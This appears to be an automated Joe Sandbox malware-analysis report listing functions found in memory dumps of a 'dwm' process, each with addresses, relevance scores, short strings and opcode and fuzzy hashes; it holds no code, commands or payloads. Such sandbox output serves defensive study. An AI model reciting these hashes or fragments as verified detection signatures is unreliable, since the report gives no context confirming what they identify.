Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID: p[{
API String ID: 0-1026465790
Opcode ID: 09276392e3dc1a3034b3b4f89d79a7de13e3b13d9f12dd7e97662623532a07f5
Instruction ID: 654d0b9421e44357895d32221b595401600959c72f13aee40cb1754db2de924d
Opcode Fuzzy Hash: 09276392e3dc1a3034b3b4f89d79a7de13e3b13d9f12dd7e97662623532a07f5
Instruction Fuzzy Hash: BA22A170E559198FEBA5EB58C8997ECB7B2FF58340F9041A9900DE3292CE346E81CF41

Function 00007FF887B2736B Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

/y, xrefs: 00007FF887B27386

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID: /y
API String ID: 0-1848535646
Opcode ID: b1ce239828da656db15e08f05e7efe46c6d9395ff5561898576e6c3a67c99523
Instruction ID: f635dd93dc51290eb5b795639744284310bd1b6af39f18bae5ea6168ebff10cd
Opcode Fuzzy Hash: b1ce239828da656db15e08f05e7efe46c6d9395ff5561898576e6c3a67c99523
Instruction Fuzzy Hash: 7F61F130D6E64A8FEB95DB6488146BDBBB3FF45380F9805BAD11EC7182DE286842C745

Function 00007FF887B1843D Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FF887B184C9

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B18000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b18000_dwm.jbxd

Similarity

API ID:
String ID: N_^
API String ID: 0-884294832
Opcode ID: 5ca13931d6f14a7c2d4ae0c0268c047898258e7a56c102f5820d63a792d257cc
Instruction ID: a3429b52faa54a33200683f6837a592a0168f9c35a3e98d9fd524ade69297337
Opcode Fuzzy Hash: 5ca13931d6f14a7c2d4ae0c0268c047898258e7a56c102f5820d63a792d257cc
Instruction Fuzzy Hash: D941E56684E7C25EE703A76858A51ED3FB0FF133B4F0904B7D498CA093DD58980AC312

Function 00007FF887B280A8 Relevance: 1.4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

r6y, xrefs: 00007FF887B280C5

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID: r6y
API String ID: 0-3142403458
Opcode ID: 7605a746962c63399bb8b00ba8f814db5421d279e5e1fa453ec1f727f0d27928
Instruction ID: 815abf9133eae6452668891379955a2097a6d51943f331da14f2847190f06634
Opcode Fuzzy Hash: 7605a746962c63399bb8b00ba8f814db5421d279e5e1fa453ec1f727f0d27928
Instruction Fuzzy Hash: A531A532F6D94A4BE758961C94911BDB3F2FF493A1F94427AD05EC3686DE28BC02C680

Function 00007FF887B26FE2 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

r6y, xrefs: 00007FF887B27013

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID: r6y
API String ID: 0-3142403458
Opcode ID: e3c30520d664001f85c3c2c2f41be5e0cc8a7d32c6a593b6eb5eb22f694e7893
Instruction ID: 82a979d6803ec218d88d17c61ac023dbacb3878e0a743232d98ee70f33908a08
Opcode Fuzzy Hash: e3c30520d664001f85c3c2c2f41be5e0cc8a7d32c6a593b6eb5eb22f694e7893
Instruction Fuzzy Hash: 4B310431E1891D9FDF99DB18C865AADB7B2FF58310F4401AAD00EE3691CA35A980CB00

Function 00007FF887B27580 Relevance: .7, Instructions: 681COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 565c1851df082165ce020163ea4981d26e329a92f22bfac319cfb3bfe2715f0e
Instruction ID: 36b10552a9cab617d7b030969848edb8b7164bac377e62dcf34e8fa2297d86d9
Opcode Fuzzy Hash: 565c1851df082165ce020163ea4981d26e329a92f22bfac319cfb3bfe2715f0e
Instruction Fuzzy Hash: 4B32B430A69A198FDB98DB18C859ABD73F3FF59310F9401B9D10EC7292DE24AC45CB85

Function 00007FF887B194C1 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B18000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b18000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab831ebfa1f3a2a69c713349d10442154b38041e6b8c91f064455f5186c7f5a4
Instruction ID: 4e7e10782a163099450e332fb8fd1a0114c30f8426afa05b5bcc2088a6185217
Opcode Fuzzy Hash: ab831ebfa1f3a2a69c713349d10442154b38041e6b8c91f064455f5186c7f5a4
Instruction Fuzzy Hash: ADB11771D18699CFEB98DFA8D4647ACBBB2FF69340F14007AD009E7692CA386841CB11

Function 00007FF887B25C3F Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0059f552296d367a693f0a5f45d5b2850f918096f04a40fcad95d0425025e157
Instruction ID: 950ee787fd1ab1614c79dfbfd35de3eedaceeb5038a19009249eac2e9e6d1382
Opcode Fuzzy Hash: 0059f552296d367a693f0a5f45d5b2850f918096f04a40fcad95d0425025e157
Instruction Fuzzy Hash: CE01DF6295E2CA8FDB61B27868055EC7F20AF122A4B8806FBE158C60D3ED5C5809C396

Function 00007FF887B28A06 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30a4bbcbc98a51d33296c81015920147bbb06dda10a6f8afd223e15ad2889778
Instruction ID: 57720a55e3573b85ddda39635c83c894e5c46ce5ec358c183583e388344d2aab
Opcode Fuzzy Hash: 30a4bbcbc98a51d33296c81015920147bbb06dda10a6f8afd223e15ad2889778
Instruction Fuzzy Hash: CB7125319AE6424FE3789A2898951BD77F2FF46390B94057ED08EC3582DE2DF842C742

Function 00007FF887B258E1 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 417d2a8c040a63145de5fe20b53bec395833dc1df3c1765bb9dc973f8b6041a9
Instruction ID: 1fc28fdd9b363e7ebf0f34fe2141d896933891fcb70f4827aa501dac57eb55de
Opcode Fuzzy Hash: 417d2a8c040a63145de5fe20b53bec395833dc1df3c1765bb9dc973f8b6041a9
Instruction Fuzzy Hash: B9711A34A6E54D8FD7A8DA08C8866BC37E2FF49361BA402F5D45EC7591DE28EC06C781

Function 00007FF887B2AC51 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49b39b9a1e98e11b11fc8af094f0ad716eb64d3fa9ec9301e8e31d956360ae01
Instruction ID: 7a541499800fdb7f1a6805f09cae55e1b0033ee55a4b05cc727f2a0b9b6cd0fa
Opcode Fuzzy Hash: 49b39b9a1e98e11b11fc8af094f0ad716eb64d3fa9ec9301e8e31d956360ae01
Instruction Fuzzy Hash: DC81E2305AAB068FE369DB14C59557977F2FF04340BA0497DC88E87A92DB39B842DB41

Function 00007FF887B29E1F Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cee20360e3f5ce8f86adeae54705c274d8769d5956aec744396ba9c45b84087
Instruction ID: 0151da9da8caf103aca062fb9a11bd8b81db4a0a79184e4cf01504051b58ad81
Opcode Fuzzy Hash: 5cee20360e3f5ce8f86adeae54705c274d8769d5956aec744396ba9c45b84087
Instruction Fuzzy Hash: 7281F0305696568FE789CF18C0D06B83BB2FF55350B9446BDC85B8B68BC628F882C780

Function 00007FF887B2BB6A Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee84a6fa9706e00852e497354812e8a044d3b923160a8df05f4b7f4283a4ae5b
Instruction ID: 9a62b5c719fda7ee4526ba5ba4bb27262d007c507723f21c03880a2a8daf60fd
Opcode Fuzzy Hash: ee84a6fa9706e00852e497354812e8a044d3b923160a8df05f4b7f4283a4ae5b
Instruction Fuzzy Hash: 26819470A58A5D8EDB94EB68C855BEDB7B2FF58340F5005BAE00DE3291DE34A980CB51

Function 00007FF887B1D9C5 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbfddf21650289b07482961e6862bf4241eff7273bb24a8bead103d4bad42cf3
Instruction ID: ea3216a09ea3ff94c72215075934d612e20c6481f93a4f2f5f6505b1652f364d
Opcode Fuzzy Hash: bbfddf21650289b07482961e6862bf4241eff7273bb24a8bead103d4bad42cf3
Instruction Fuzzy Hash: A6610670E48A4D8FDB94EFA8D8556ADB7B2FF59340F5005BAE00DE7282CE346981CB50

Function 00007FF887B1E991 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12d8170b273d3dfca178fd57920bd83969d735888a1d95a8c9a54343dcb9cc4a
Instruction ID: f5428911bbf443bb88af1eea6675f90f0ddcbc6bc454dbfafb1d6a1e86b1ec19
Opcode Fuzzy Hash: 12d8170b273d3dfca178fd57920bd83969d735888a1d95a8c9a54343dcb9cc4a
Instruction Fuzzy Hash: 2E512C71D58A5D8FDB94EF68D895BECBBF2FB58341F50016AD00DE3252DA34A841CB40

Function 00007FF887B1E9B0 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b22e6790a87ddbdb93782850277fbc82deb9c56f947937261712491da7924f5
Instruction ID: 689c369603454303944236ca9e60cf155649d1665580b25549b4c3c491464a06
Opcode Fuzzy Hash: 9b22e6790a87ddbdb93782850277fbc82deb9c56f947937261712491da7924f5
Instruction Fuzzy Hash: B7510871D18A5D8FEB94EBA8D895BEDBBF2FB58341F50016AD00DE3252DA346881CB50

Function 00007FF887B2C989 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76d7c4e786d7ebfb1095fe0bc91e907b5d50ef75af18aa5d084aeb4f26d2ec4d
Instruction ID: 6cb4ebef68aeabfb87e4f618c0fffc3544f12a71840947b8b70832d64053a90d
Opcode Fuzzy Hash: 76d7c4e786d7ebfb1095fe0bc91e907b5d50ef75af18aa5d084aeb4f26d2ec4d
Instruction Fuzzy Hash: 7951F270D5961D8FEB54EBA8D8896EDB7B2FF59340F60027AD009E7282DE386C41CB41

Function 00007FF887B20388 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 888d4161b4eaeeb030f71ecb205aa4951b6d934404df84307be6cb8f3965f5b0
Instruction ID: 1c9f59e5e2d0b2500b81880270a68331119dda4adca0a31b2391779e1455aa04
Opcode Fuzzy Hash: 888d4161b4eaeeb030f71ecb205aa4951b6d934404df84307be6cb8f3965f5b0
Instruction Fuzzy Hash: 0F41DE31D4E68D8FEB45EB6898642FCBBB1FF1A340F4400BAD058D7282CB389804CB51

Function 00007FF887B196AD Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B18000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b18000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33021e4eb29f19a9b9a9cb61e483c3e9f5ce432e0d4f518e799b398e8fbe9b15
Instruction ID: 448d407a84d4a92e4eb57aed0aa2fdcfd805cb5f188684a5f181037bda854651
Opcode Fuzzy Hash: 33021e4eb29f19a9b9a9cb61e483c3e9f5ce432e0d4f518e799b398e8fbe9b15
Instruction Fuzzy Hash: 62518470D1899DCFDF98EB98C4A5BACB7B2FF69340F1444A9D01DD7692CA35A841CB01

Function 00007FF887B1D780 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4e5cd8a5a73fa84a55b56701c1b0c3f267fbb611ffe24e850bd5659d2517cd8
Instruction ID: b23f839453e67bc643ccacad693f638711c9b3802caf7e431136fee19ad67323
Opcode Fuzzy Hash: d4e5cd8a5a73fa84a55b56701c1b0c3f267fbb611ffe24e850bd5659d2517cd8
Instruction Fuzzy Hash: EE51757185E3C58FD7038BB488759953FF0AF17210B0A49EBD4C4CF4A3D228695AD722

Function 00007FF887B1E110 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c81b41895bf0b2638fb1da13138d0d1756cf3c8bbf54b84696f493943ecc5550
Instruction ID: 3e001d9eeccce1a7c59c1d980509bb4b96a4c9c0f07da72508423547d95a9a38
Opcode Fuzzy Hash: c81b41895bf0b2638fb1da13138d0d1756cf3c8bbf54b84696f493943ecc5550
Instruction Fuzzy Hash: 20419330D586498FEB45EBA4D8557FDBBB1FF49310F0501B6E408E7292CE386845CBA2

Function 00007FF887B28820 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a69ba4291db2cd74ce7db44f3e8a4d7d513ec5c5a04415be09166a9d90ffd08
Instruction ID: 9928ed784fbd4d8d1469373fb73f49263d715bf488d4314aef5786ce302d36f8
Opcode Fuzzy Hash: 1a69ba4291db2cd74ce7db44f3e8a4d7d513ec5c5a04415be09166a9d90ffd08
Instruction Fuzzy Hash: C8411370D5851A8EEB54EBA8D8957FDB7F2FF58350F50013AD009A3282CF38A981CB95

Function 00007FF887B11519 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b10000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fec444711dbec7625cc2625d35dd49fcad9e27b6b60fe0f8e9500a9c79fec390
Instruction ID: 2348261f398794f6eb92e0b5dac15d0e19cdf599664c9acc5cd181c0a6730a9e
Opcode Fuzzy Hash: fec444711dbec7625cc2625d35dd49fcad9e27b6b60fe0f8e9500a9c79fec390
Instruction Fuzzy Hash: 5B416570D9960D8FEB84EF98D4646FDBBB2FF49340F54007AD00AE7292CA396844CB60

Function 00007FF887B2B277 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb1533dff080bfe02282644a2a2d00c3396f5bccbad2adf5d48abdb528ece0b3
Instruction ID: 3685f5d531d41b653a8df8353bd94daa91672406c2c81d88c90164193927cc2c
Opcode Fuzzy Hash: eb1533dff080bfe02282644a2a2d00c3396f5bccbad2adf5d48abdb528ece0b3
Instruction Fuzzy Hash: 8041A435A1C9088FDF9CEF28C455EB9B3E2FF69324B44056AD00EC3592DE24E895CB81

Function 00007FF887B2B321 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fb828d111de3334915c87c7ad6e164abe7c56d9c0f9848ec7968a15da42b260
Instruction ID: 051b2b20b81179eaef1c088fc05a86fcc8a45b958c99ed7b7534533c6dd076b2
Opcode Fuzzy Hash: 3fb828d111de3334915c87c7ad6e164abe7c56d9c0f9848ec7968a15da42b260
Instruction Fuzzy Hash: 4E319235A1C9488FDF5DEF28C455EA573E2FF6931470406A9D00EC7592DE24E885CB81

Function 00007FF887B2B2BB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86cef179b3d3bf28f1c3cd944f9fd19188e1d8b36f7d9a71ceb595ba497d1c1a
Instruction ID: e1e04ad047ca40e1b4c3141bb16b0f14958e87a9f29cb4fb5d8fde3671d8d5f9
Opcode Fuzzy Hash: 86cef179b3d3bf28f1c3cd944f9fd19188e1d8b36f7d9a71ceb595ba497d1c1a
Instruction Fuzzy Hash: 78318235A1C9498FDF9CEF28C455EB9B3E2FF693147040669D00EC7592DE24E885CB81

Function 00007FF887B18973 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B18000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b18000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82063e2d3ab2f6bbd592f05a961269d2459831578fb2f166fa60eda3136a8045
Instruction ID: 25b35403cabee5dae3ea0c0910db68616c625250475f5f6a45b57e27938cebec
Opcode Fuzzy Hash: 82063e2d3ab2f6bbd592f05a961269d2459831578fb2f166fa60eda3136a8045
Instruction Fuzzy Hash: 94311A71E5891D8FEB94EB98D8956FCBBB2FF59390F501139D00DE3282CE24A841DB50

Function 00007FF887B28419 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4f146806fd4e0f26b3a8709441df47c994c1539689c7061fc8d0fec6e9bc255
Instruction ID: 9fdfd8b586875e517b040129629308a3fc62269e96fc1ca8c27c6a7eaaddaf8f
Opcode Fuzzy Hash: c4f146806fd4e0f26b3a8709441df47c994c1539689c7061fc8d0fec6e9bc255
Instruction Fuzzy Hash: B9317030ABE95A8FE764C71898D49BD77B2FF59390BA80076D02EC7191DE28F801D751

Function 00007FF887B28810 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 554fd4904ae27ea9485ff38c91783283b50fa68b3e8551e02cf46eb719cd0711
Instruction ID: b9cdc8223982a63ecb30b9340a3060ebb9208a11f490c239ccc6ea2ae6f9e842
Opcode Fuzzy Hash: 554fd4904ae27ea9485ff38c91783283b50fa68b3e8551e02cf46eb719cd0711
Instruction Fuzzy Hash: 93315530D5861A8FEB54EFA8C8956EDBBF2FF58350F50013AD019E3281CE386980CB95

Function 00007FF887B2B085 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3652cfe1cf147528bed82a9db38bf48f665038da026d876516586c6cebb681fe
Instruction ID: 0f6684e02d9321f246857b6bf0759369423758da54ed09f28fd077d77b58b96a
Opcode Fuzzy Hash: 3652cfe1cf147528bed82a9db38bf48f665038da026d876516586c6cebb681fe
Instruction Fuzzy Hash: 70311530AB990ACEEBA8DB448455ABE77B2FF48349F90017AD01ED3281EE386940D741

Function 00007FF887B189E2 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B18000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b18000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 308f6ac0c215570f60dd76015cdb7c9c0d2c328b7c888f5543872a8d5c08faac
Instruction ID: 03bca8cf55ec62d20024ddbff10a8e1736c308ba92a9ed68ea46c85b0c0f403f
Opcode Fuzzy Hash: 308f6ac0c215570f60dd76015cdb7c9c0d2c328b7c888f5543872a8d5c08faac
Instruction Fuzzy Hash: 56210A71E5890D8FEB94EBA8D8956EDBBB2FF59350F51113AD00DE3282DE24A841CB50

Function 00007FF887B29F70 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09a2cb7692d7d50eaac9f5533b59c32f60d5e22b824b093ad09622e187328935
Instruction ID: 89bd2e3451401d92a7bfbbd371d286acaa345cf044955e7dc5f396c69f7f90c2
Opcode Fuzzy Hash: 09a2cb7692d7d50eaac9f5533b59c32f60d5e22b824b093ad09622e187328935
Instruction Fuzzy Hash: 22314D309BE5D68AE36A8238486457D7B72FF5234075C46BAC49FCB0DBD92CB885D341

Function 00007FF887B28928 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fcedbe349f1e41f1642108121360a403f97a66341f8d11f5f08190056e6339c
Instruction ID: 535a9007b405e9bca740d0cc9853180e7d14e92f122b041d413db7971a0857e9
Opcode Fuzzy Hash: 8fcedbe349f1e41f1642108121360a403f97a66341f8d11f5f08190056e6339c
Instruction Fuzzy Hash: 07213B72E5D98A5FEB45DA2898563B977E1FF25390F5445BAC00EC35D3DE28A809C301

Function 00007FF887B28930 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a439d9e462b99564ea0d3cc7f5b3cb1c916dea244a0e9e3f22b1fcd1a2c8c84
Instruction ID: 7b3c8b095a5509948c42578fa36c6abaf6e1b93538641e7fabb62fd13a82c929
Opcode Fuzzy Hash: 3a439d9e462b99564ea0d3cc7f5b3cb1c916dea244a0e9e3f22b1fcd1a2c8c84
Instruction Fuzzy Hash: E9213872E5EA8A5FE7459A2898453B877E1FF25390F44457AC00EC3593DE18A809C302

Function 00007FF887B27AC3 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdb61f436d8c554c9b169bd17fac57da727e3659e81bab99a438decdda24d22e
Instruction ID: cec14edf0b6be7412cf92dad1cbb7aa4d9563379dc0b7cdb54e20948e243c54a
Opcode Fuzzy Hash: cdb61f436d8c554c9b169bd17fac57da727e3659e81bab99a438decdda24d22e
Instruction Fuzzy Hash: 6921F530A6D6094FDB98DB18C855A7873E3FF49361F840179D14EC3591CA29AC41CB44

Function 00007FF887B28938 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1610228550.00007FF887B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff887b1d000_dwm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 176871d24dd3a844c514050c8cc47018d3b47c5fce8ade14bbf58d2e0aebb100
Instruction ID: c06dec20419cc83256144d46d9f0ebe68985db9828d0e64cfc4a247ea031f2af
Opcode Fuzzy Hash: 176871d24dd3a844c514050c8cc47018d3b47c5fce8ade14bbf58d2e0aebb100
